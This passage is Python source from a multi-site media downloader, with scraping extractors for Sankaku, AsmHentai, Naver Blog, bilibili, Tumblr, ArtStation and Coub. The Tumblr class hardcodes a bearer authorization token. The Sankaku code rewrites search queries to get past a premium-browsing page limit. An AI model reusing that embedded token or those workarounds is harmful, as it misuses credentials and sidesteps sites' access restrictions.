                elif 'post-content-notification' in html: # sankaku plus
                    print_('Sankaku plus: {}'.format(self['id']))
                    return ''
                else:
                    t_sleep = 5
                s = '[Sankaku] failed to read image (id:{}): {}'.format(self['id'], e)
                print_(s)
                sleep(t_sleep, self.cw)
        else:
            raise Exception('can not find image (id:{})\n{}'.format(self['id'], e_msg))
        soup = Soup('<p>{}</p>'.format(url))
        url = soup.string
        d = {
            'id': self['id'],
            }
        return {'url': url, 'name': utils.format('sankaku', d, get_ext(url))}


class Downloader_sankaku(Downloader):
    type = 'sankaku'
    URLS = ['chan.sankakucomplex.com', 'idol.sankakucomplex.com', 'www.sankakucomplex.com']
    MAX_CORE = 4
    display_name = 'Sankaku Complex'
    ACCEPT_COOKIES = [r'(.*\.)?(sankakucomplex\.com|sankaku\.app)']

    def init(self):
        type = self.url.split('sankakucomplex.com')[0].split('//')[-1].strip('.').split('.')[-1]
        if type == '':
            type = 'www'
        if type not in ['chan', 'idol', 'www']:
            raise Exception('Not supported subdomain')
        self.type_sankaku = type
        self.url = self.url.replace('&commit=Search', '')
        self.url = clean_url(self.url)
        self.session = Session()

    @lazy
    def soup(self):
        html = downloader.read_html(self.url, session=self.session)
        return Soup(html)

    @classmethod
    def fix_url(cls, url):
        if 'sankakucomplex.com' not in url:
            url = url.replace(' ', '+')
            while '++' in url:
                url = url.replace('++', '+')
            url = quote(url)
            url = url.replace('%2B', '+')
            url = url.replace('%20', '+')#
            if url.startswith('[chan]'):
                type = 'chan'
                url = url.replace('[chan]', '', 1).strip()
            elif url.startswith('[idol]'):
                type = 'idol'
                url = url.replace('[idol]', '', 1).strip()
            elif url.startswith('[www]'):
                type = 'www'
                url = url.replace('[www]', '', 1).strip()
            else:
                raise Exception('Not supported subdomain')
            url = 'https://{}.sankakucomplex.com/?tags={}'.format(type, url)
        return url.replace('http://', 'https://')

    @lazy
    def id(self):
        if self.type_sankaku == 'www':
            id = '[www] ' + self.soup.find('h1', class_='entry-title').text.strip()
        else:
            if '/post/show/' in self.url or '/posts/' in self.url: #6718
                id = get_id(self.url, self.soup)
            else:
qs = query_url(self.url) tags = qs.get('tags', []) tags.sort() id = ' '.join(tags) if not id: id = 'N/A' id = '[{}] {}'.format(self.type_sankaku, id) return clean_title(id) @property def name(self): return self.id def read(self): ui_setting = self.ui_setting self.title = self.name types = ['img', 'gif', 'video'] if ui_setting.exFile.isChecked(): if ui_setting.exFileImg.isChecked(): types.remove('img') if ui_setting.exFileGif.isChecked(): types.remove('gif') if ui_setting.exFileVideo.isChecked(): types.remove('video') if self.type_sankaku == 'www': imgs = get_imgs_www(self.url, self.soup) else: info = get_imgs(self.url, self.name, cw=self.cw, types=types, session=self.session) self.single = info['single'] imgs = info['imgs'] self.urls += imgs self.title = self.name def get_imgs_www(url, soup): imgs = [] view = soup.find('div', class_='entry-content') for img in view.findAll('img'): img = img.get('data-lazy-src') if not img: # no script continue img = urljoin(url, img) if img in imgs: print('duplicate', img) continue imgs.append(img) return imgs def setPage(url, page): # Always use HTTPS url = url.replace('http://', 'https://') # Change the page if 'page=' in url: url = re.sub(r'page=[0-9]*', 'page={}'.format(page), url) else: url += '&page={}'.format(page) return url @limits(6) def wait(cw): check_alive(cw) def get_imgs(url, title=None, cw=None, types=['img', 'gif', 'video'], session=None): print_ = get_print(cw) print_('types: {}'.format(', '.join(types))) if 'chan.sankakucomplex' in url: type = 'chan' elif 'idol.sankakucomplex' in url: type = 'idol' else: raise Exception('Not supported subdomain') info = {} info['single'] = False if '/post/show/' in url or '/posts/' in url: #6718 info['single'] = True id = get_id(url) info['imgs'] = [File_sankaku({'type': type, 'id': id, 'referer': url})] return info # Range max_pid = get_max_range(cw) local_ids = {} if cw is not None: dir = cw.downloader.dir try: names = os.listdir(dir) except Exception as e: print(e) names = [] for name in names: id = os.path.splitext(name)[0] local_ids[id] = os.path.join(dir, name) imgs = [] page = 1 ids = set() url_old = 'https://{}.sankakucomplex.com'.format(type) if cw is not None: cw.setTitle('{} {}'.format(tr_('읽는 중...'), title)) while len(imgs) < max_pid: #if page > 25: # Anonymous users can only view 25 pages of results # break wait(cw) #url = setPage(url, page) print_(url) try: html = downloader.read_html(url, referer=url_old, session=session) except Exception as e: #3366 print_(print_error(e)) break if '429 Too many requests'.lower() in html.lower(): print_('429 Too many requests... 
wait 120 secs') sleep(120, cw) continue page += 1 url_old = url soup = Soup(html) for banner in soup.findAll('div', class_='has-mail'): #5861 banner.decompose() banner = soup.find('div', class_='popular-previews') if banner: #6171 banner.decompose() err = soup.find('div', class_='post-premium-browsing_error') if err and not imgs: raise errors.LoginRequired(err.text.strip()) articles = soup.findAll('span', {'class': 'thumb'}) if not articles: if soup.find(class_='post-premium-browsing_error'): #6418 print_('premium error') tags = utils.query_url(url)['tags'][0] tags = re.sub(r'id_range:<[0-9]+', '', tags).strip() tags += f' id_range:<{min(ids)}' url = utils.update_url_query(url, {'tags': tags}) url = re.sub(r'&page=[0-9]+', '', url) url = re.sub(r'&next=[0-9]+', '', url) continue print_('no articles') break for article in articles: # 1183 tags = article.find('img', class_='preview')['data-auto_page'].split() #6718 if 'animated_gif' in tags: type_ = 'gif' elif 'animated' in tags or 'webm' in tags or 'video' in tags or 'mp4' in tags: # 1697 type_ = 'video' else: type_ = 'img' if type_ not in types: continue url_img = article.a['href'] if not url_img.startswith('http'): url_img = urljoin('https://{}.sankakucomplex.com'.format(type), url_img) if 'get.sankaku.plus' in url_img: # sankaku plus continue id = int(re.find(r'p([0-9]+)', article['id'], err='no id')) #5892 #print_(article) if str(id) in local_ids: #print('skip', id) local = True else: local = False #print(url_img) if id not in ids: ids.add(id) if local: img = local_ids[str(id)] else: img = File_sankaku({'type':type, 'id':id, 'referer':url_img}) imgs.append(img) if len(imgs) >= max_pid: break try: # For page > 50 pagination = soup.find('div', class_='pagination') url = urljoin('https://{}.sankakucomplex.com'.format(type), utils.html.unescape(pagination['next-page-url'])) #6326 ## #3366 ## p = int(re.find(r'[?&]page=([0-9]+)', url, default=1)) ## if p > 100: ## break except Exception as e: print_(print_error(e)) #url = setPage(url, page) break if cw is not None: cw.setTitle('{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs))) else: print(len(imgs), 'imgs') if not imgs: raise Exception('no images') info['imgs'] = imgs return info def get_id(url, soup=None): if soup is None: html = downloader.read_html(url) soup = Soup(html) if x := soup.find('input', id='post_id'): return x['value'] return soup.find('p', id='hidden_post_id').string File: src/extractor/asmhentai_downloader.py #coding: utf8 import downloader import ree as re from utils import Soup, urljoin, Downloader, join, Session, File, clean_title, limits import os import utils def get_id(url): try: return int(url) except: return int(re.find('/(g|gallery)/([0-9]+)', url)[1]) class File_asmhentai(File): type = 'asmhentai' format = 'name' @limits(.25) def get(self): soup = downloader.read_soup(self['referer'], self['rereferer'], session=self.session) img = soup.find('img', id='fimg') url = img['data-src'] name, ext = os.path.splitext(os.path.basename(url).split('?')[0]) d = { 'name': clean_title(name), } return {'url': url, 'name': utils.format('asmhentai', d, ext)} class Downloader_asmhentai(Downloader): type = 'asmhentai' URLS = ['asmhentai.com'] MAX_CORE = 8 display_name = 'AsmHentai' ACCEPT_COOKIES = [r'(.*\.)?asmhentai\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): id_ = get_id(url) return f'https://asmhentai.com/g/{id_}/' def read(self): info = get_info(self.url, self.session, self.cw) self.print_(info) # 1225 artist = join(info['artist']) 
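        # join() presumably collapses the artist tag list into a single display
        # string (assumption); group/language/parody fall back to 'N/A' below
        # when the gallery carries no such tags.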
        self.artist = artist
        group = join(info['group']) if info['group'] else 'N/A'
        lang = info['language'][0] if info['language'] else 'N/A'
        series = info['parody'][0] if info['parody'] else 'N/A'
        title = self.format_title(info['category'][0], info['id'], info['title'], artist, group, series, lang)

        for i in range(info['n']):
            url = f'https://asmhentai.com/gallery/{info["id"]}/{i+1}/'
            file = File_asmhentai({'referer':url, 'rereferer': self.url})
            self.urls.append(file)

        self.title = title


def get_info(url, session, cw):
    html = downloader.read_html(url, session=session)
    soup = Soup(html)

    info = {}
    info['id'] = get_id(url)

    title = soup.find('h1').text.strip()
    info['title'] = title

    for tag in soup.findAll('span', class_='tag'):
        href = tag.parent.attrs['href']
        href = urljoin(url, href).strip('/')
        key = href.split('/')[3]
        value = href.split('/')[-1]
        if key == 'language' and value == 'translated':
            continue
        if key in info:
            info[key].append(value)
        else:
            info[key] = [value]

    for key in ['artist', 'group', 'parody', 'tag', 'character']:
        if key not in info:
            info[key] = []

    info['n'] = int(soup.find('input', id='t_pages')['value'])

    return info


File: src/extractor/naver_downloader.py

#coding:utf-8
import downloader
import ree as re
from utils import urljoin, Downloader, Soup, LazyUrl, clean_title, get_ext, get_print, Session, json
import errors


PATTERNS = ['.*blog.naver.com/(?P<username>.+)/(?P<pid>[0-9]+)',
            '.*blog.naver.com/.+?blogId=(?P<username>[^&]+).+?logNo=(?P<pid>[0-9]+)',
            '.*?(?P<username>[0-9a-zA-Z_-]+)\.blog\.me/(?P<pid>[0-9]+)']


def get_id(url):
    for pattern in PATTERNS:
        m = re.match(pattern, url)
        if m is None:
            continue
        username = m.group('username')
        pid = m.group('pid')
        break
    else:
        username, pid = None, None
    return username, pid


class Downloader_naver(Downloader):
    type = 'naver'
    URLS = ['blog.naver.', '.blog.me']
    display_name = 'Naver Blog'
    ACCEPT_COOKIES = [r'(.*\.)?naver\.com', r'(.*\.)?blog\.me']

    def init(self):
        self.session = Session()
        username, pid = get_id(self.url)
        if username is None:
            raise errors.Invalid(f'Invalid format: {self.url}')
        self.url = f'https://blog.naver.com/{username}/{pid}'

    @property
    def name(self):
        username, pid = get_id(self.url)
        return clean_title(f'{username}/{pid}')

    def read(self):
        self.title = f'읽는 중... 
{self.name}' imgs = get_imgs(self.url, self.session, self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name class Image: def __init__(self, url, referer, p): self.url = LazyUrl(referer, lambda _: url, self) #3788, #3817 ext = get_ext(url) self.filename = f'{p:04}{ext}' class Video: def __init__(self, url, referer, p): self.url = LazyUrl(referer, lambda _: url, self) self.filename = f'video_{p}.mp4' def read_page(url, session, depth=0): print('read_page', url, depth) if depth > 10: raise Exception('Too deep') html = downloader.read_html(url, session=session) if len(html) < 5000: id = re.find('logNo=([0-9]+)', html, err='no id') username = re.find('blog.naver.com/([0-9a-zA-Z]+)', url) or re.find('blogId=([0-9a-zA-Z]+)', url, err='no username') url = f'https://m.blog.naver.com/PostView.nhn?blogId={username}&logNo={id}&proxyReferer=' soup = Soup(html) if soup.find('div', {'id': 'viewTypeSelector'}): return url, soup frame = soup.find('frame') if frame is None: print('frame is None') return read_page(url, session, depth+1) return read_page(urljoin('https://blog.naver.com', frame.attrs['src']), session, depth+1) def get_imgs(url, session, cw): print_ = get_print(cw) url = url.replace('blog.naver', 'm.blog.naver') referer = url url_frame, soup = read_page(url, session) imgs = [] urls = set() view = soup.find('div', {'id': 'viewTypeSelector'}) print('view', view is not None) imgs_ = view.findAll('span', class_='_img') + view.findAll('img') for img in imgs_: url = img.attrs.get('src') if not url: url = img.attrs.get('thumburl') if not url: continue if 'ssl.pstatic.net' in url: # continue if 'blogpfthumb-phinf.pstatic.net' in url: # profile continue if 'dthumb-phinf.pstatic.net' in url: # link continue if 'storep-phinf.pstatic.net' in url: # emoticon continue url = url.replace('mblogthumb-phinf', 'blogfiles') #url = re.sub('\?type=[a-zA-Z0-9]*', '?type=w1@2x', url) #url = re.sub('\?type=[a-zA-Z0-9]*', '', url) url = url.split('?')[0] if url in urls: print('### Duplicate:', url) continue urls.add(url) #url = url.split('?type=')[0] img = Image(url, referer, len(imgs)) imgs.append(img) pairs = [] for video in soup.findAll(class_='_naverVideo'): vid = video.attrs['vid'] key = video.attrs['key'] pairs.append((vid, key)) print_(f'pairs: {pairs}') for script in soup.findAll('script', class_='__se_module_data'): data_raw = script['data-module'] data = json.loads(data_raw)['data'] vid = data.get('vid') if not vid: continue key = data['inkey'] pairs.append((vid, key)) videos = [] for vid, key in pairs: url_api = f'https://apis.naver.com/rmcnmv/rmcnmv/vod/play/v2.0/{vid}?key={key}' data_raw = downloader.read_html(url_api, session=session) data = json.loads(data_raw) fs = data['videos']['list'] fs = sorted(fs, key=lambda f: f['size'], reverse=True) video = Video(fs[0]['source'], url_frame, len(videos)) videos.append(video) return imgs + videos File: src/extractor/bili_downloader.py import downloader import downloader_v3 from utils import Downloader, get_print, format_filename, clean_title, get_resolution, try_n, Session, uuid, File, get_max_range, query_url import os from io import BytesIO import ffmpeg import math import ree as re import ytdl import constants from putils import DIR import threading import errors _VALID_URL = r'''(?x) https?:// (?:(?:www|bangumi)\.)? 
bilibili\.(?:tv|com)/ (?: (?: video/[aA][vV]| anime/(?P<anime_id>\d+)/play\# )(?P<id_bv>\d+)| video/[bB][vV](?P<id>[^/?#&]+) ) ''' class File_bili(File): type = 'bili' thread_audio = None @try_n(4) def get(self): session = self.session cw = self.cw print_ = get_print(cw) options = { #'noplaylist': True, #5562 #'extract_flat': True, 'playlistend': 1, } ydl = ytdl.YoutubeDL(options, cw=cw) info = ydl.extract_info(self['referer']) #5562 entries = info.get('entries') if entries: info.update(entries[0]) fs = info['formats'] res = max(get_resolution(), min(f.get('height', 0) for f in fs)) print_(f'res: {res}') fs = [f for f in fs if f.get('height', 0) <= res] for f in fs: print_(f"{f['format']} - {f['url']}") f_video = sorted(fs, key=lambda f:(f.get('height', 0), f.get('vbr', 0)))[-1] print_('video: {}'.format(f_video['format'])) if f_video.get('abr'): f_audio = None else: fs_audio = sorted([f_audio for f_audio in fs if f_audio.get('abr')], key=lambda f:f['abr']) if fs_audio: f_audio = fs_audio[-1] else: raise Exception('no audio') print_('audio: {}'.format(f_audio['format'])) title = info['title'] url_thumb = info['thumbnail'] ext = info['ext'] session.headers.update(info.get('http_headers', {})) mobj = re.match(_VALID_URL, self['referer']) video_id = mobj.group('id') info = { 'url': f_video['url'], 'url_thumb': url_thumb, 'name': format_filename(title, video_id, ext), } if f_audio: def f(): audio = f_audio['url'] path = os.path.join(DIR, f'{uuid()}_a.tmp') if cw is not None: cw.trash_can.append(path) if constants.FAST: downloader_v3.download(audio, session=self.session, chunk=1024*1024, n_threads=2, outdir=os.path.dirname(path), fileName=os.path.basename(path), customWidget=cw, overwrite=True) else: downloader.download(audio, session=self.session, outdir=os.path.dirname(path), fileName=os.path.basename(path), customWidget=cw, overwrite=True) self.audio_path = path print_('audio done') self.thread_audio = threading.Thread(target=f, daemon=True) self.thread_audio.start() return info def pp(self, filename): if self.thread_audio: self.thread_audio.join() ffmpeg.merge(filename, self.audio_path, cw=self.cw) return filename # 1804 @try_n(2) def fix_url(url, cw=None): print_ = get_print(cw) if '?' 
in url: tail = url.split('?')[1] else: tail = None soup = downloader.read_soup(url, methods={'requests'}) err = soup.find('div', class_='error-text') if err: raise errors.Invalid('{}: {}'.format(err.text.strip(), url)) meta = soup.find('meta', {'itemprop': 'url'}) if meta: url_new = meta.attrs['content'] if tail: url_new = '{}?{}'.format(url_new, tail) print_('redirect: {} -> {}'.format(url, url_new)) else: url_new = url print_('no redirect') return url_new class Downloader_bili(Downloader): type = 'bili' URLS = [r'regex:'+_VALID_URL, 'space.bilibili.com/'] lock = True detect_removed = False detect_local_lazy = False display_name = 'bilibili' single = True ACCEPT_COOKIES = [r'(.*\.)?bilibili\.com'] def init(self): self.url = fix_url(self.url, self.cw) if 'bilibili.com' not in self.url.lower(): self.url = 'https://www.bilibili.com/video/{}'.format(self.url) self.url = self.url.replace('m.bilibili', 'bilibili') self.session = Session() @classmethod def key_id(cls, url): mobj = re.match(_VALID_URL, url) video_id = mobj.group('id') qs = query_url(url) p = qs.get('p', ['1'])[0] #6580 return f'{video_id or url} {p}' @property def id_(self): mobj = re.match(_VALID_URL, self.url) video_id = mobj.group('id') #anime_id = mobj.group('anime_id') return video_id def read(self): sd = self.session.cookies.get('SESSDATA', domain='.bilibili.com') self.print_('sd: {}'.format(sd)) if not sd: #5647 self.cw.showCookie() self.cw.showLogin('https://passport.bilibili.com/login', 1030, None) sid = re.find(r'/channel/collectiondetail?sid=([0-9]+)', self.url) mid = re.find(r'space.bilibili.com/([0-9]+)', self.url) if sid or mid: if not sd: raise errors.LoginRequired() if sid: url_api = f'https://api.bilibili.com/x/polymer/web-space/seasons_archives_list?mid={mid}&season_id={sid}' j = downloader.read_json(url_api, self.url) title = clean_title(j['data']['meta']['name']) elif mid: url_api = f'https://api.bilibili.com/x/space/wbi/acc/info?mid={mid}' j = downloader.read_json(url_api, self.url) title = clean_title(j['data']['name']) else: raise NotImplementedError() self.single = False options = { 'extract_flat': True, 'playlistend': get_max_range(self.cw), } ydl = ytdl.YoutubeDL(options, cw=self.cw) info = ydl.extract_info(self.url) files = [] for e in info['entries']: files.append(File_bili({'referer': e['url']})) self.print_(f'urls: {len(files)}') file = self.process_playlist(title, files) self.title = title else: file = File_bili({'referer': self.url}) file.ready(self.cw) self.urls.append(file) self.title = os.path.splitext(file['name'])[0] thumb = BytesIO() downloader.download(file['url_thumb'], buffer=thumb) self.setIcon(thumb) n = int(math.ceil(8.0 / len(self.urls))) self.print_(f'n_threads: {n}') self.enableSegment(n_threads=n, overwrite=True) File: src/extractor/tumblr_downloader.py #coding:utf8 import downloader from translator import tr_ from utils import Session, query_url, get_max_range, Downloader, clean_title, update_url_query, get_print, get_ext, LazyUrl, urljoin, check_alive, limits import ree as re import errors from error_printer import print_error class Image: def __init__(self, url, id, referer, p, cw=None): self._url = url self.id_ = id self.p = p self.cw = cw self.url = LazyUrl(referer, self.get, self) @limits(.25) def get(self, _): print_ = get_print(self.cw) url = self._url ext = get_ext(url) if ext.lower()[1:] not in ['jpg', 'png', 'mp4']: #4645 print_('get_ext: {}, {}'.format(self.id_, url)) try: ext = downloader.get_ext(url, referer=_) except Exception as e: #3235 print_('Err: {}, 
{}\n'.format(self.id_, url)+print_error(e)) self.filename = '{}_p{}{}'.format(self.id_, self.p, ext) return url class Downloader_tumblr(Downloader): type = 'tumblr' URLS = ['tumblr.com'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?tumblr\.com'] def init(self): if 'tumblr.com/post/' in self.url: raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url)) self.session = Session() @classmethod def fix_url(cls, url): qs = query_url(url) path = qs.get('redirect_to') if path: url = urljoin('https://tumblr.com', path[0]) id = get_id(url) return 'https://{}.tumblr.com'.format(id) def read(self): username = get_id(self.url) name = get_name(username, self.session) for img in get_imgs(username, self.session, cw=self.cw): self.urls.append(img.url) self.title = clean_title('{} (tumblr_{})'.format(name, username)) class TumblrAPI: _url_base = 'https://www.tumblr.com/api' _hdr = { 'referer': 'https://www.tumblr.com', 'authorization': 'Bearer aIcXSOoTtqrzR8L8YEIOmBeW94c3FmbSNSWAUbxsny9KKx5VFh', } _qs = { 'fields[blogs]': 'name,avatar,title,url,is_adult,?is_member,description_npf,uuid,can_be_followed,?followed,?advertiser_name,is_paywall_on,theme,subscription_plan,?primary,share_likes,share_following,can_subscribe,subscribed,ask,?can_submit,?is_blocked_from_primary,?tweet,?admin,can_message,?analytics_url,?top_tags,paywall_access', 'npf': 'true', 'reblog_info': 'false', 'include_pinned_posts': 'false', #'page_number': None, } def __init__(self, session, cw=None): self.session = session self.cw = cw def print_(self, s): get_print(self.cw)(s) @limits(1) def call(self, path, qs, default_qs=True): if default_qs: qs_new = qs qs = self._qs.copy() qs.update(qs_new) url = self._url_base + path url = update_url_query(url, qs) r = self.session.get(url, headers=self._hdr) data = r.json() errs = data.get('errors', []) if errs: code = int(errs[0]['code']) if code == 0: raise Exception('Not found') elif code == 4012: raise errors.LoginRequired(errs[0]['detail']) r.raise_for_status() return data['response'] def name(self, username): path = '/v2/blog/{}/posts'.format(username) data = self.call(path, {}) return data['blog']['title'] or data['blog']['name'] def posts(self, username): path = '/v2/blog/{}/posts'.format(username) qs = {} ids = set() default_qs = True while True: check_alive(self.cw) data = self.call(path, qs, default_qs=default_qs) for post in (post for post in data['posts'] if post['object_type'] != 'backfill_ad'): id_ = post['id'] if id_ in ids: self.print_('duplicate: {}'.format(id_)) continue ids.add(id_) url = 'https://{}.tumblr.com/post/{}'.format(username, id_) yield Post(post, url, self.cw) try: links = data.get('links') or data['_links'] path_next = links['next']['href'] except: path_next = None if path_next: path = path_next default_qs = False else: break class Post: def __init__(self, data, url, cw=None): id_ = data['id'] self.imgs = [] cs = data['content'] for trail in data['trail']: cs += trail['content'] for c in cs: if c['type'] in ['image', 'video']: media = c.get('media') if not media: #2859 continue if isinstance(media, list): media = media[0] img = media['url'] self.imgs.append(Image(img, id_, url, len(self.imgs), cw)) elif c['type'] in ['text', 'link', 'audio']: continue else: raise NotImplementedError(id_, c) def get_name(username, session): return TumblrAPI(session).name(username) def get_imgs(username, session, cw=None): artist = get_name(username, session) imgs = [] max_pid = get_max_range(cw) api = TumblrAPI(session, cw) for post in api.posts(username): check_alive(cw) imgs += 
post.imgs s = '{} {} (tumblr_{}) - {}'.format(tr_('읽는 중...'), artist, username, len(imgs)) if cw: cw.setTitle(s) else: print(s) if len(imgs) > max_pid: break return imgs[:max_pid] def get_id(url): if '/dashboard/blog/' in url: url = re.find('/dashboard/blog/([0-9a-zA-Z_-]+)', url) if '/login_required/' in url: url = url.split('/login_required/')[1].split('?')[0].split('/')[0] if 'tumblr.com/blog/view/' in url: url = url.split('tumblr.com/blog/view/')[1] if 'tumblr.com' in url: qs = query_url(url) url_ = qs.get('url') if url_: return get_id(url_) id = url.split('tumblr.com')[0].split('/')[-1].strip('.') if id == 'www': url = re.find(r'tumblr\.com/([^/#?]+)', url, err='no id') #6333 else: url = id return url File: src/extractor/artstation_downloader.py #coding:utf8 import downloader from error_printer import print_error from translator import tr_ from utils import Downloader, Soup, get_print, lazy, Session, try_n, File, clean_title, check_alive, get_ext, get_max_range import dateutil.parser import utils class File_artstation(File): type = 'artstation' format = '[date] name_ppage' c_alter = 0 def alter(self): #6401 self.c_alter += 1 if self.c_alter % 2 == 0: url = self['url'] else: url = self['url'].replace('/4k/', '/large/') return url class Downloader_artstation(Downloader): type = 'artstation' URLS = ['artstation.com'] display_name = 'ArtStation' ACCEPT_COOKIES = [r'(.*\.)?artstation\.(com|co)'] url_main = None @try_n(8) def init(self): # 3849 self.session = Session() import clf2 clf2.solve(self.url, self.session, self.cw) _ = self._id.replace('artstation_', '', 1) self.url_main = f'https://www.artstation.com/{_}' if '/artwork/' in self.url or '/projects/' in self.url: pass else: self.url = self.url_main self.print_(self.url) @classmethod def fix_url(cls, url): #6516 if '.artstation.com' in url: sub = url.split('.artstation.com')[0].split('/')[-1] if sub != 'www': url = f'https://www.artstation.com/{sub}' return url @lazy def _id(self): _id = get_id(self.url, self.cw) return f'artstation_{_id}' @lazy @try_n(2) def name(self): soup = downloader.read_soup(self.url_main, session=self.session) name = soup.find('meta', {'property': 'og:title'}).attrs['content'] return clean_title(f'{name} ({self._id})') def read(self): self.title = self.name id_ = self._id.replace('artstation_', '', 1) if '/' in id_: id_ = id_.split('/')[0] if '/artwork/' in self.url or '/projects/' in self.url: id_art = get_id_art(self.url) imgs = get_imgs_page(id_art, self.session, cw=self.cw) else: imgs = get_imgs(id_, self.title, self.session, cw=self.cw) for img in imgs: self.urls.append(img) self.title = self.name @try_n(2) def get_imgs(id_, title, session, cw=None): print_ = get_print(cw) referer = f'https://www.artstation.com/{id_}' downloader.read_html(referer, session=session) #print(session.cookies.keys()) url = f'https://www.artstation.com/users/{id_}/quick.json' j = downloader.read_json(url, referer, session=session) uid = j['id'] datas = [] ids = set() for p in range(1, 1000): check_alive(cw) url = f'https://www.artstation.com/users/{id_}/projects.json??user_id={uid}&page={p}' #6516 j = try_n(4)(downloader.read_json)(url, referer, session=session) data = j['data'] if not data: break for d in data: if d['id'] not in ids: ids.add(d['id']) datas.append(d) if cw: cw.setTitle(f'{tr_("페이지 읽는 중...")} {title} - {len(datas)}') else: print(len(datas)) datas = sorted(datas, key=lambda data: int(data['id']), reverse=True) imgs = [] i = 0 names = set() while i < len(datas): check_alive(cw) data = datas[i] date = 
data['created_at'] post_url = data['permalink'] #print('post_url', post_url) id_art = get_id_art(post_url) imgs += get_imgs_page(id_art, session, date=date, cw=cw, names=names) if len(imgs) >= get_max_range(cw): break if cw: cw.setTitle(f'{tr_("이미지 읽는 중...")} {title} - {i+1} / {len(datas)} ({len(imgs)})') else: print(len(imgs)) i += 1 return imgs def get_id_art(post_url): return post_url.split('/artwork/')[-1].split('/projects/')[-1].split('/')[0].split('?')[0].split('#')[0] def get_id(url, cw=None): print_ = get_print(cw) url = url.split('?')[0].split('#')[0] if '/artwork/' in url: id_art = get_id_art(url) imgs = get_imgs_page(id_art, session=Session(), cw=cw) return imgs[0].data['user']['username'] if '.artstation.' in url and 'www.artstation.' not in url: id_ = url.split('.artstation')[0].split('//')[-1] type_ = None elif 'artstation.com' in url: paths = url.split('artstation.com/')[1].split('/') id_ = paths[0] type_ = paths[1] if len(paths) > 1 else None else: id_ = url.replace('artstation_', '').replace('/', '/') type_ = None if type_ not in [None, 'likes']: type_ = None print_(f'type: {type_}, id: {id_}') if type_: return f'{id_}/{type_}' return id_ def get_imgs_page(id_art, session, date=None, cw=None, names=None): print_ = get_print(cw) url_json = f'https://www.artstation.com/projects/{id_art}.json' post_url = f'https://www.artstation.com/artwork/{id_art}' name = post_url.strip('/').split('/')[-1] if names is not None: while name.lower() in names: name += '_' names.add(name.lower()) try: data = downloader.read_json(url_json, session=session, referer=post_url) imgs_ = data['assets'] except Exception as e: print_(print_error(e)) return [] if date is None: date = data['created_at'] date = dateutil.parser.parse(date) imgs = [] for page, img in enumerate(imgs_): if not img['has_image']: print('no img') continue url = None embed = img.get('player_embedded') if embed: soup = Soup(embed) url_embed = soup.find('iframe').attrs['src'] print_(f'embed: {url_embed}') try: soup = downloader.read_soup(url_embed, post_url, session=session) v = soup.find('video') if v: url = v.find('source').attrs['src'] except Exception as e: print_(print_error(e)) if not url: try: url = soup.find('link', {'rel': 'canonical'}).attrs['href'] print_(f'YouTube: {url}') raise Exception('YouTube') except Exception as e: print(e) url = None if not url: url = img['image_url'] d = { 'date': date, 'name': clean_title(name), 'page': page, } filename = utils.format('artstation', d, get_ext(url)) img = File_artstation({'referer':post_url, 'url':url.replace('/large/', '/4k/'), 'name': filename}) img.data = data imgs.append(img) return imgs File: src/extractor/coub_downloader.py from utils import Downloader, LazyUrl, try_n, format_filename, get_ext import ytdl from io import BytesIO as IO import downloader import ree as re PATTEN_IMAGIZER = r'coub-com-.+\.imagizer\.com' def get_id(url): return re.find(r'/view/([0-9a-z]+)', url, err='no id') class Downloader_coub(Downloader): type = 'coub' URLS = ['coub.com', r'regex:'+PATTEN_IMAGIZER] single = True ACCEPT_COOKIES = [r'(.*\.)?coub\.com'] @classmethod def fix_url(cls, url): return re.sub(PATTEN_IMAGIZER, 'coub.com', url) @classmethod def key_id(cls, url): return get_id(url) def read(self): video = Video(self.url, cw=self.cw) video.url()# self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self, pp=self.pp) self.cw = cw @try_n(2) def get(self, 
url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) fs = [f for f in info['formats'] if f['ext'] == 'mp4'] f = sorted(fs, key=lambda f: int(f.get('filesize', 0)))[-1] self._url = f['url'] ## fs = [f for f in info['formats'] if f['ext'] == 'mp3'] ## self.f_audio = sorted(fs, key=lambda f: int(f.get('filesize', 0)))[-1] self.thumb_url = info['thumbnails'][0]['url'] self.thumb = IO() downloader.download(self.thumb_url, buffer=self.thumb) self.title = info['title'] ext = get_ext(self._url) self.filename = format_filename(self.title, info['id'], ext) return self._url def pp(self, filename): ## import ffmpeg ## f = IO() ## downloader.download(self.f_audio['url'], buffer=f) ## ffmpeg.merge(filename, f) return filename File: src/extractor/etc_downloader.py import downloader import ytdl from utils import Downloader, Session, try_n, LazyUrl, get_ext, format_filename, get_print, get_resolution from io import BytesIO import ree as re from m3u8_tools import playlist2stream, M3u8_stream import utils import ffmpeg import clf2 import os class Downloader_etc(Downloader): type = 'etc' URLS = ['thisvid.com'] #5153 single = True MAX_PARALLEL = 8 display_name = 'Etc' PRIORITY = 10 def init(self): self.session = Session() name = ytdl.get_extractor_name(self.url) self.print_('extractor: {}'.format(name)) if name == 'ixigua': #6290 clf2.solve(self.url, session=self.session) #if name == 'generic': # raise NotImplementedError() def read(self): video = get_video(self.url, self.session, self.cw) if video.artist: self.artist = video.artist self.urls.append(video.url) self.print_('url_thumb: {}'.format(video.url_thumb)) self.setIcon(video.thumb) if video.header.lower() not in ['yourporn', 'spankbang']: self.enableSegment()# if isinstance(video.url(), M3u8_stream): self.disableSegment() self.title = os.path.splitext(video.filename)[0].replace(':', ':') def int_or_none(s): try: return int(s) except: return None def format_(f): if f is None: return 'None' return 'format:{} - resolution:{} - vbr:{} - audio:{} - url:{}'.format(f['format'], f['_resolution'], f['_vbr'], f['_audio'], f['url']) class UnSupportedError(Exception):pass def get_video(url, session, cw, ie_key=None): print_ = get_print(cw) try: video = _get_video(url, session, cw, ie_key, allow_m3u8=True) if isinstance(video, Exception): raise video if isinstance(video.url(), M3u8_stream): c = video.url().segs[0].download(2, cw) if not c: raise Exception('invalid m3u8') return video except Exception as e: if isinstance(e, UnSupportedError): raise e print_(e) return _get_video(url, session, cw, ie_key, allow_m3u8=False) @try_n(4) def _get_video(url, session, cw, ie_key=None, allow_m3u8=True): print_ = get_print(cw) print_('get_video: {}, {}'.format(allow_m3u8, url)) options = { 'noplaylist': True, #'extract_flat': True, 'playlistend': 1, 